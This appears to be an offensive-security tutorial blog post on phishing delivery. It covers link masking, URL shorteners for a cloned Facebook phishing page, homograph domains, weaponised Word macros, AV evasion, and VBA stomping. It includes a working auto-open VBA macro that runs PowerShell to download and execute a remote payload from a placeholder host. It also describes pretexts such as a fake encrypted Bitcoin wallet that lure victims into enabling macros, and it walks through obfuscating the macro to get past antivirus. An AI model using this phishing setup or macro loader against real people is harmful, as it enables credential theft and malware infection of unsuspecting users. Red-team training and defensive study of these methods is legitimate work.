(+) Links and Attachments

An approach to better understand this technique at a deeper level

Links

As we know from this technique it's a well known method in Phishing it is commonly used to avoid Sandboxes from the email provider. (More on Sandbox). In a nutshell sandbox isolate suspicious software and executes it in a "jailed" environment so it cannot harm the host device.

Let's work on some techniques that can help with links.

Hyperlinks Technique

Sometimes when you receive an email with a Coupon for Walmart you will always, definitely be sent somewhere else, to go and type in your information. But scammers or phishers to save time are sometimes "Lazy" and send stuff "as-is", this is usually very detectable and we can tell right away it's a illegitimate Coupon.

Let's check a sample on my SPAM folder:

Sample - 1

Look, lucky me my AV protection is going to expire on "$date" time to renew!!. If we see here we can tell that it has a little bit of sense done here, their was a Hyperlink applied to the word "HERE" look's legit. But what happens when I hover over the "HERE" text.

Sample - 2 Link

What a weird looking directory, but it has to be legit right, it is hosted on a google page. Let's visit the subdomain.

Sample - 3 Page

As you can see here Hyperlinks are a great way to hide malicious links but anyone aware in security knows that this is a illegitimate email.

Shortening Technique

This technique is used to shorten down very large URL link's and hide the malicious ones with legitimate shortening URL links, some very popular one's are:

• Bitly

• Rebrandy

• Clkim

• Tiny URL

As these are widely used by commercial services sometimes they can slip by our trained eye and be wary of them as malicious one's.

Let's set one up:

We run our preferred phishing tool. A simple Facebook Website for phishing

Sample - 4 Facebook Fake

We see it is currently using the IP and port number, this can be fixed with more tools (NGROK) but from here let's simply copy that IP and send it and shorten it.

So now we can use that Shortened link!, let's see it in action.

We see how we can even trick user's using legit shortener, and even more easier to use these in case we are doing more advanced techniques that require less text.

Homograph Technique

A homograph attack is a method of deception where in a threat actor leverages on the similarities of character scripts to create and register phony domains of existing ones to fool users and lure them into visiting. Here is an example:

https://dmϲxblue.net

https://dmcxblue.net

To the naked eye they look very similar, but try copy & paste both of them and use them in the URL bar, you will notice that one of them doesn't get resolved correctly, but why is that?. Well because the incorrect one is using Greek Lunate Sigma Symbol while the other is just a regular "c". Being wary of this technique is very valuable as domains can be registered and then used with these unique characters.

Attachments

Just as the name implies it's just a file attached to the Email these require more work as the email providers have Sandbox and their own methods for scanning malicious files, from here we will skip the email and go straight to the machine and work on a few methods.

Macros - Obfuscation

Very popular one's Macros a setup of automated processes to execute when the file is Opened, their are some great tools that can automate this procedure but I will demonstrate a simple VBA macro.

Will use Word for this demonstration, very easy to setup Open A Word Document >> Options >> Ribbons >> Developer. With this we will enable the Developer Tab and have the ability to add Macros and our VBA Code.

Fake Bitcoin Wallet

We see here that we are sending a Bitcoin Wallet or an Encrypted Message to the user making them believe that they need to "Enable Macros" for it's proper decryption, just find your proper excuse to have this feature enabled.

Now let's work on the VBA Code part, we can move to the Developer Tab and Choose the VBA Button, proceed onto adding our VBA Code.

Sub Auto_Open()
    Dim exec As String
    Dim testvar As String
    exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://0.0.0.0/payload.txt'))"""
    Shell (exec)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

Let's read this code a little.

• Sub A Sub procedure is a series of Visual Basic statements enclosed by the Sub and End Sub statements

• Dim stands for dimension, used to declare variables in visual basic with proper datatype definition.

• Exec Runs the specified program or command by using the specified arguments.

• Shell Runs an executable program and returns a Variant (Double) representing the program's task ID if successful; otherwise, it returns zero.

Let's add this code onto our Macro and edit it to our needs, such as IP address and Payload being called.

Demo:

But this is a very simple method any AV would detect this method as it's simple to read, and verify what the VBA script is doing. Our AV was suspended now let's turn it on and see what happens now with an AV running.

Warning Again

And then we see it.

A warning that our AV found the Macro as malicious, why is that? Well the command line used in powershell is very well known for techniques in downloading scripts and executing them in memory but let's try obfuscating our code. As much as I would love to I will not release the scripted I used to make this obfuscation since I don't want it detected any time soon.

But here is a sample on the obfuscation applied to the VBA Code:

Obfuscated VBA

It's somewhat simple to understand here variable names have been switched to random strings code has been encrypted with XOR and I also used a PowerShell One-Liner that bypasses current AV, as well as a custom PS1 Script. (I went all out for this one).

So let's check our new payload now that AV is enabled. And try to get a connection back to our attacking machine.

VBA Stomping - (Evil Clippy)

Evil Clippy a tool released in BlackHat Asia in 2019 it is a a maldoc assistant which help's red teams to bypass popular AV and get an initial foothold, in this category we will focus on the VBA Stomping technique. Discovered years ago by Dr. Vesselin Bontchev (here). At a high level explanation of this attack by creating a malicious document we can actually add a non-malicious macro into the source code of the file, as explained by Dr. Bontchev what actually executes is the p-code stored in the document as long as it's compatible with the current VBA version.

Let's work with some samples a Non-malicious Macro is created. A message box is to be displayed when the document is opened.

Now from here we want to modify the VBA source code utilized while leaving the p-code unchanged. To edit this file you will unzip it and edit the vbaProject.bin file using a hex editor, but only withing the VBA source code storage location, not the p-code section.

Now that the VBA source code has been manually edited we will open the document and inspect the VBA Code BEFORE the "Enable Content" button is clicked.

We see here that the source-code still displays XYZ but in fact once the content is enabled we see a message box displaying "ABC"

Well what happened here?. Our source code stated that XYZ was going to be executed but instead ABC was displayed and later on our Code updated to match the execution.

As Dr. Bontchev explains, the p-code stored in the document is what actually executes

More info on this attack here.